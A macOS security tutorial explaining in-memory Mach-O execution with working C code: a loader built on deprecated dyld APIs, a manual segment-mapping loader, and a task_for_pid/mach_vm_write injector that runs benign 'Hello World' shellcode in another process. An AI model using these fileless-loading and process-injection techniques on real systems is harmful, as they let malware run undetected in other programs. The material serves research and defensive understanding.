In-Memory Mach-O Execution on macOS

In-memory execution on macOS: yes, it’s a thing. Some time ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

In-memory execution means running executable code directly from memory without writing a file to disk. The trick is in dynamic loading. A process image in memory and its image on disk are different things, so you can’t just copy a file into memory and jump to it. Instead, you use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule to handle the in-memory mapping and linking. Apple’s headers have marked these as deprecated since Mac OS X 10.5 in favor of dlopen, but dyld still ships them, and how they behave internally varies between macOS releases.

I found this example which loads a binary or bundle into a region of memory.

But first, we need to know what a Mach-O file actually is.

Mach-O Format

Mach-O is the standard binary format for executables, object code, shared libraries, and core dumps on macOS and iOS. There are several types:

Executable - code and data for running a program
Dynamic Library (.dylib) - shared code usable by multiple programs
Bundle (.bundle) - code that can be loaded dynamically at runtime

The format consists of headers, load commands, and segments. Each segment may contain executable code, initialized data, and metadata. The dynamic linker dyld uses this metadata to map the file into memory, resolve symbols, and execute it. The two main segments are __TEXT (executable code) and __DATA (global variables).
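To make the layout concrete, here is a minimal sketch that reads the fixed-size header out of a byte buffer. The struct mirrors mach_header_64 from <mach-o/loader.h>, but it is redeclared locally under a made-up name (my_mach_header_64) so the snippet builds without the macOS SDK. The helper names read_macho_header and macho_filetype_name are mine, not part of any Apple API.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local mirror of struct mach_header_64 (assumption: same field order
 * and sizes as <mach-o/loader.h>). */
struct my_mach_header_64 {
    uint32_t magic;      /* 0xfeedfacf for 64-bit, host byte order */
    int32_t  cputype;
    int32_t  cpusubtype;
    uint32_t filetype;   /* MH_EXECUTE, MH_DYLIB, MH_BUNDLE, ... */
    uint32_t ncmds;      /* number of load commands */
    uint32_t sizeofcmds; /* total size of the load commands in bytes */
    uint32_t flags;
    uint32_t reserved;
};

#define MY_MH_MAGIC_64 0xfeedfacfu
#define MY_MH_EXECUTE  0x2u
#define MY_MH_DYLIB    0x6u
#define MY_MH_BUNDLE   0x8u

/* Copy the header out of buf. Returns 0 on success, -1 if buf is too
 * short, is not a 64-bit Mach-O, or the load commands overrun it. */
int read_macho_header(const void *buf, size_t len, struct my_mach_header_64 *out) {
    assert(buf != NULL && out != NULL);
    if (len < sizeof *out) return -1;
    memcpy(out, buf, sizeof *out);          /* memcpy avoids unaligned reads */
    if (out->magic != MY_MH_MAGIC_64) return -1;
    if (out->sizeofcmds > len - sizeof *out) return -1;
    return 0;
}

/* Human-readable name for the three file types discussed above. */
const char *macho_filetype_name(uint32_t filetype) {
    switch (filetype) {
    case MY_MH_EXECUTE: return "EXECUTE";
    case MY_MH_DYLIB:   return "DYLIB";
    case MY_MH_BUNDLE:  return "BUNDLE";
    default:            return "OTHER";
    }
}
```

Fat (universal) binaries and 32-bit or byte-swapped images are deliberately rejected here; a real tool would handle those magics too.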

~$ otool -hV /Applications/Signal.app/Contents/MacOS/Signal
Mach header
      magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
MH_MAGIC_64   X86_64        ALL LIB64     EXECUTE    16       1544   NOUNDEFS DYLDLINK TWOLEVEL PIE

~$ otool -l /Applications/Signal.app/Contents/MacOS/Signal
Load command 0
      cmd LC_SEGMENT_64
  cmdsize 72
  segname __PAGEZERO
   vmaddr 0x0000000000000000
   vmsize 0x0000000100000000
  fileoff 0
 filesize 0
  maxprot 0x00000000
 initprot 0x00000000
   nsects 0
    flags 0x0
...

The bundle format is the most relevant here. A bundle (file type MH_BUNDLE) is a loadable module, much like a dynamic library, that a program pulls in at runtime. When dyld processes the Mach-O headers and load commands, it maps the file’s segments into memory, sets the proper permissions (read, execute, read/write), and resolves all required symbols before passing control to the entry point.
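As a rough illustration of the first half of that job, the sketch below walks a load-command area and prints each LC_SEGMENT_64 with its initial protection, similar to what otool -l shows. The structs are local mirrors of load_command and segment_command_64 (assumed to match <mach-o/loader.h>), and prot_string and list_segments are hypothetical helper names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MY_LC_SEGMENT_64 0x19u

/* Local mirrors of the SDK structs (assumption: identical layout). */
struct my_load_command { uint32_t cmd, cmdsize; };
struct my_segment_command_64 {
    uint32_t cmd, cmdsize;
    char     segname[16];
    uint64_t vmaddr, vmsize, fileoff, filesize;
    int32_t  maxprot, initprot;
    uint32_t nsects, flags;
};

/* Render VM_PROT_READ (1), VM_PROT_WRITE (2), VM_PROT_EXECUTE (4) as "rwx". */
void prot_string(int32_t prot, char out[4]) {
    out[0] = (prot & 1) ? 'r' : '-';
    out[1] = (prot & 2) ? 'w' : '-';
    out[2] = (prot & 4) ? 'x' : '-';
    out[3] = '\0';
}

/* cmds points just past the Mach-O header; len is the bytes available.
 * Prints one line per segment and returns the segment count, or -1 if
 * a command is truncated or has an impossible size. */
int list_segments(const uint8_t *cmds, size_t len, uint32_t ncmds, FILE *fp) {
    assert(cmds != NULL && fp != NULL);
    size_t off = 0;
    int count = 0;
    for (uint32_t i = 0; i < ncmds; i++) {
        struct my_load_command lc;
        if (len - off < sizeof lc) return -1;
        memcpy(&lc, cmds + off, sizeof lc);
        if (lc.cmdsize < sizeof lc || lc.cmdsize > len - off) return -1;
        if (lc.cmd == MY_LC_SEGMENT_64) {
            struct my_segment_command_64 seg;
            char prot[4];
            if (lc.cmdsize < sizeof seg) return -1;
            memcpy(&seg, cmds + off, sizeof seg);
            prot_string(seg.initprot, prot);
            fprintf(fp, "%-16.16s vmaddr=0x%llx vmsize=0x%llx %s\n", seg.segname,
                    (unsigned long long)seg.vmaddr,
                    (unsigned long long)seg.vmsize, prot);
            count++;
        }
        off += lc.cmdsize;   /* cmdsize was checked against len - off above */
    }
    return count;
}
```

A loader would use the same walk, but instead of printing it would record where each segment has to land and which protection it should end up with.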

For in-memory execution without touching disk, we have to do what dyld does ourselves: map segments into memory, set permissions, resolve symbols. That’s the whole game.
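One detail that is easy to miss: the addresses in the file are link-time addresses, and the loader rarely gets to use them as-is. A common approach (sketched here with hypothetical names seg_range, image_span and slid_address) is to compute the span covered by all mappable segments, reserve one region of that size, and translate every link-time address by the resulting slide.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The three fields of a segment command this calculation needs. */
struct seg_range {
    uint64_t vmaddr;
    uint64_t vmsize;
    int32_t  initprot;   /* 0 means no access, e.g. __PAGEZERO */
};

/* Find the lowest start and highest end over all segments that are
 * actually mapped. Returns 0 on success, -1 if nothing is mappable
 * or a segment's end address would overflow. */
int image_span(const struct seg_range *segs, size_t n, uint64_t *lo, uint64_t *hi) {
    assert(segs != NULL && lo != NULL && hi != NULL);
    uint64_t min = UINT64_MAX, max = 0;
    for (size_t i = 0; i < n; i++) {
        if (segs[i].initprot == 0 || segs[i].vmsize == 0) continue;
        if (segs[i].vmaddr > UINT64_MAX - segs[i].vmsize) return -1;
        if (segs[i].vmaddr < min) min = segs[i].vmaddr;
        if (segs[i].vmaddr + segs[i].vmsize > max) max = segs[i].vmaddr + segs[i].vmsize;
    }
    if (min >= max) return -1;
    *lo = min;
    *hi = max;
    return 0;
}

/* Translate a link-time address into the region that starts at base. */
uint64_t slid_address(uint64_t link_addr, uint64_t lo, uint64_t base) {
    return base + (link_addr - lo);
}
```

With the segments from a typical executable, the 4 GB __PAGEZERO entry is skipped because its protection is zero, so the reserved region only has to cover __TEXT through the last data segment.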

Mach-O Format Reference

Deprecated API Approach

The old way uses NSCreateObjectFileImageFromMemory and NSLinkModule. Both are long deprecated but worth understanding:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY);
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE),
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

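Here dyld does the heavy lifting from a buffer we hand it: we map the file into memory, create an object file image, link the module, resolve the _execute symbol, and call it. The bundle is read from test.bundle for convenience, but the buffer could just as well come from a network download, in which case our own code writes nothing to disk. Recent dyld versions reportedly implement this call by writing the buffer to a temporary file and loading that, which is what the dyld patching work linked at the end deals with.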

Apple’s supported route for dynamic loading is dlopen/dlsym/dlclose. But dlopen expects a file on disk. For purely in-memory execution, we need to manually parse Mach-O headers and set up memory regions with mmap, doing dyld’s job ourselves.

Manual Mach-O Loading

No deprecated APIs. We parse the Mach-O headers, map segments, resolve symbols from the symbol table, and call the target function:

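#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>

/* Toy loader: no rebase or bind fixups are applied, so _execute must be
 * self-contained (no imported functions, no absolute pointers). */
void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb;
    if (fstat(fd, &sb) < 0 || (size_t)sb.st_size < sizeof(struct mach_header_64)) { close(fd); return; }
    size_t fileSize = (size_t)sb.st_size;
    uint8_t *file = mmap(NULL, fileSize, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (file == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)file;
    if (header->magic != MH_MAGIC_64) { munmap(file, fileSize); return; }

    /* Pass 1: find the VM range covered by the segments and locate LC_SYMTAB. */
    uint64_t lo = UINT64_MAX, hi = 0;
    struct symtab_command *symTabCmd = NULL;
    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *seg = (struct segment_command_64 *)loadCmd;
            if (seg->initprot != 0 && seg->vmsize > 0) {   /* skips __PAGEZERO */
                if (seg->vmaddr < lo) lo = seg->vmaddr;
                if (seg->vmaddr + seg->vmsize > hi) hi = seg->vmaddr + seg->vmsize;
            }
        } else if (loadCmd->cmd == LC_SYMTAB) {
            symTabCmd = (struct symtab_command *)loadCmd;
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }
    if (lo >= hi || !symTabCmd) { munmap(file, fileSize); return; }

    /* Reserve one region for the whole image and let the kernel pick the base.
     * Requesting segCmd->vmaddr as an mmap hint is not reliable: a bundle is
     * linked at address 0, which can never be mapped. On Apple silicon an RWX
     * mapping is expected to need MAP_JIT; this sketch assumes x86_64. */
    size_t imageSize = (size_t)(hi - lo);
    uint8_t *base = mmap(NULL, imageSize, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) { munmap(file, fileSize); return; }

    /* Pass 2: copy each segment's file contents to its offset inside the region. */
    loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *seg = (struct segment_command_64 *)loadCmd;
            if (seg->initprot != 0 && seg->filesize > 0 && seg->filesize <= seg->vmsize &&
                seg->fileoff <= fileSize && seg->filesize <= fileSize - seg->fileoff)
                memcpy(base + (seg->vmaddr - lo), file + seg->fileoff, seg->filesize);
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    /* Look up _execute and call it at its slid address, not at the raw n_value. */
    struct nlist_64 *symTbl = (struct nlist_64 *)(file + symTabCmd->symoff);
    char *strTbl = (char *)(file + symTabCmd->stroff);
    for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
        if ((symTbl[i].n_type & N_STAB) || (symTbl[i].n_type & N_TYPE) != N_SECT) continue;
        if (symTbl[i].n_value < lo || symTbl[i].n_value >= hi) continue;
        if (strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
            void (*fn)(void) = (void (*)(void))(uintptr_t)(base + (symTbl[i].n_value - lo));
            fn();
            break;
        }
    }
    munmap(base, imageSize);
    munmap(file, fileSize);
}

int main() { load_macho("test.bundle"); return 0; }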

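Open the file, check the magic, iterate through the load commands to map all LC_SEGMENT_64 segments into executable memory, then walk the symbol table looking for _execute and call it. This covers only a slice of what dyld does: nothing here rebases pointers or binds imported symbols, so it only works for self-contained code.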
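The symbol-table walk is the part most likely to go wrong on a malformed or stripped file, so here is a slightly more defensive sketch of just that step. It works on plain arrays so it can be tried without a real Mach-O. The struct is a local mirror of nlist_64 (assumed to match <mach-o/nlist.h>), and find_defined_symbol is a hypothetical helper name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Local mirror of struct nlist_64 (assumption: identical layout). */
struct my_nlist_64 {
    uint32_t n_strx;   /* offset of the name in the string table */
    uint8_t  n_type;
    uint8_t  n_sect;
    uint16_t n_desc;
    uint64_t n_value;  /* link-time address for defined symbols */
};

#define MY_N_STAB 0xe0u   /* debugging entries */
#define MY_N_TYPE 0x0eu   /* mask for the type bits */
#define MY_N_SECT 0x0eu   /* symbol is defined in a section */

/* Find a symbol that is defined in this image. Returns 0 and stores the
 * link-time address in *value, or -1 if there is no such symbol. */
int find_defined_symbol(const struct my_nlist_64 *syms, uint32_t nsyms,
                        const char *strtab, uint32_t strsize,
                        const char *name, uint64_t *value) {
    assert(syms != NULL && strtab != NULL && name != NULL && value != NULL);
    size_t want = strlen(name);
    for (uint32_t i = 0; i < nsyms; i++) {
        const struct my_nlist_64 *s = &syms[i];
        if (s->n_type & MY_N_STAB) continue;                 /* skip debug entries */
        if ((s->n_type & MY_N_TYPE) != MY_N_SECT) continue;  /* skip undefined/absolute */
        if (s->n_strx >= strsize) continue;                  /* name offset out of range */
        size_t room = strsize - s->n_strx;
        if (want >= room) continue;                          /* name plus NUL must fit */
        if (memcmp(strtab + s->n_strx, name, want + 1) == 0) {
            *value = s->n_value;
            return 0;
        }
    }
    return -1;
}
```

The returned value is still a link-time address; it has to be adjusted by the load slide before it can be called.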

Mach VM Injection

Taking it further: inject shellcode into another process using the Mach VM API. task_for_pid gets the target’s task port, mach_vm_allocate reserves memory, mach_vm_write drops the shellcode, mach_vm_protect makes it executable, and thread_create_running kicks it off:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>

/* Use the real payload length: a fixed 128 makes mach_vm_write read past the array. */
#define SHELLCODE_SIZE sizeof(shellcode)
#define STACK_SIZE     (64 * 1024)

unsigned char shellcode[] = {
    0x90, 0x90, 0x90,
    0x90, 0xeb, 0x1e,
    0x5e,
    0xb8, 0x04, 0x00, 0x00, 0x02,
    0xbf, 0x01, 0x00, 0x00, 0x00,
    0xba, 0x0e, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0xb8, 0x01, 0x00, 0x00, 0x02,
    0xbf, 0x00, 0x00, 0x00, 0x00,
    0x0f, 0x05,
    0xe8, 0xdd, 0xff, 0xff, 0xff,
    0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f,
    0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a
};

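/* Sets up the remote shellcode region and a separate stack region.
 * Returns the first failing kern_return_t, or KERN_SUCCESS. */
kern_return_t allocate_stuff(task_t task, mach_vm_address_t *shellcode_addr, mach_vm_address_t *stack_addr) {
    kern_return_t kr = mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) return kr;
    kr = mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, SHELLCODE_SIZE);
    if (kr != KERN_SUCCESS) return kr;
    /* Drop write access before the code runs: RW -> RX. */
    kr = mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
    if (kr != KERN_SUCCESS) return kr;
    return mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);
}

void do_the_injection(pid_t pid) {
    task_t task = MACH_PORT_NULL;
    mach_vm_address_t shellcode_addr = 0, stack_addr = 0;

    kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "[-] task_for_pid(%d): %s\n", pid, mach_error_string(kr));
        return;
    }

    kr = allocate_stuff(task, &shellcode_addr, &stack_addr);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "[-] remote allocation failed: %s\n", mach_error_string(kr));
        return;
    }

    /* Start at the shellcode with the stack pointer at the top of the new stack. */
    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    kr = thread_create_running(task, x86_THREAD_STATE64,
        (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
    if (kr != KERN_SUCCESS) {
        fprintf(stderr, "[-] thread_create_running: %s\n", mach_error_string(kr));
        return;
    }
    printf("[+] Injected into %d\n", pid);
}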

int main(int argc, char *argv[]) {
    if (argc < 2) { printf("Usage: %s <PID>\n", argv[0]); return -1; }
    do_the_injection(atoi(argv[1]));
    return 0;
}

r 5294
Process 5301 launched: '/Users/i/src/exec' (x86_64)
[+] Injected into 5294
Process 5301 exited with status = 0 (0x00000000)

Hello World!
[1]  + 5294 done

lldb debugging the injection

The memory map tells the story. The __TEXT segment has r-x permissions (readable, executable, not writable). The dyld private memory area shows up as rwx: memory that was mapped writable and then made executable, which is exactly the pattern you see when staging shellcode with mmap. The protection change goes from PROT_READ | PROT_WRITE to PROT_READ | PROT_EXEC (via mprotect locally, or mach_vm_protect with the equivalent VM_PROT flags for a remote task), and the shellcode runs from that region.
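The write-then-execute flip is easy to reproduce locally with plain POSIX calls. The sketch below stages a buffer in a fresh anonymous mapping, then drops write access in favor of execute. It never jumps to the code; stage_code is a hypothetical helper name, and whether the mprotect call is allowed depends on the platform’s code-signing and hardening policy.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

/* Copy len bytes of code into a new private mapping that is writable
 * while copying and read+execute afterwards. Returns the mapping and
 * stores its page-rounded size in *map_len, or returns NULL on failure.
 * The staged bytes are not executed here. */
void *stage_code(const void *code, size_t len, size_t *map_len) {
    assert(code != NULL && map_len != NULL);
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || len == 0) return NULL;

    /* Round the request up to whole pages. */
    size_t size = (len + (size_t)page - 1) / (size_t)page * (size_t)page;

    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, code, len);

    /* RW -> RX: the region is never writable and executable at once. */
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return NULL;
    }
    *map_len = size;
    return mem;
}
```

In a memory map, a region produced this way shows up as r-x with no file backing it, which is one of the things defenders look for.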

This uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(). macOS gates task_for_pid() heavily: the caller generally needs root or a debugger entitlement, and SIP blocks it for Apple-protected processes regardless. Regular users don’t get unrestricted access to other processes’ memory. That’s by design.

Patrick Wardle - In-Memory Execution · Adam Chester - dyld Patching · HackTricks - macOS SIP Bypass